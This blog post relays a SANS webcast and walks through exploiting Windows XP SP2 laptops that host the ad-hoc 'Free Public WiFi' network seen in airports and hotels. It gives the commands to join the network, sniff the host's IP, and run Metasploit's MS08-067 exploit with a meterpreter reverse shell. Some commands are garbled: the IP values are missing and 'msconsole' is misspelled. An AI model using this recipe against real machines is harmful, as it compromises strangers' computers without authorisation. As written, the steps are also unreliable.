Exploiting “Free Public WiFi”

Filed under Network Hacking

A few weeks ago Joshua Wright did a SANS webcast on Exploiting Modern Wireless Networks. For a long time WiFi attacks have focused on either cracking WEP, or brute forcing a WPA shared key. Josh goes over some of the new attack vectors against wireless and how you can use them in a penetration test.

My favorite slide had to do with that obscure “Free Public WiFi” SSID that we see all over the place. I see these all the time at airports, but also at hotels and other commonly utilized public wifi areas. Apparently this is the default name for ad-hoc networks that are created by Windows XP SP2. Obviously this gets us excited ( MS 08-067). If they are running an XP SP2 box, we can probably assume that the machine is not frequently administered, and most likely not patched. Here are the simple steps that Josh Wright provided in order to exploit this machine:

  • Connect to the adhoc network
# iwconfig wlan1 essid "Free Public WiFi" mode adhoc
  • Use tcpdump to find the IP (bolded IP below) of the XP box hosting the ad hoc network. Note: the hosting box will be broadcasting NetBIOS packets to help configure associated clients.
# tcpdump -ni wlan1 -s0 -nt
  • Configure your IP (for the reverse shell to shovel back to)
# ifconfig wlan1 netmask
  • Own It
# msconsole
# use exploit/windows/smb/ms08_067_netapi
# set PAYLOAD windows/meterpreter/reverse_tcp
# set LPORT 9999
# set RHOST
# set LHOST
# exploit

Pretty straight forward, huh? As always, thanks to the SANS teams for their awesome contributions to the security industry. Make sure to check out the new SANS Pen Testing blog! its fantastic!


  1. smartass says:

    there is a typo in the 2nd ifconfig command:
    you set your IP to 196… but it should read 169.

    You may correct your post and delete this comment if you wish.

  2. PT says:

    So I decided to help Free Public Wifi along. My home network SSID is now “Free Public WiFi” :-)

Post a Comment

You must be logged in to post a comment.

Read previous post:
Demo: Enumerating AJAX Applications with ACT (AJAX Crawling Tool)

I created this video in response to multiple and varying requests for information about the tool I just released. This...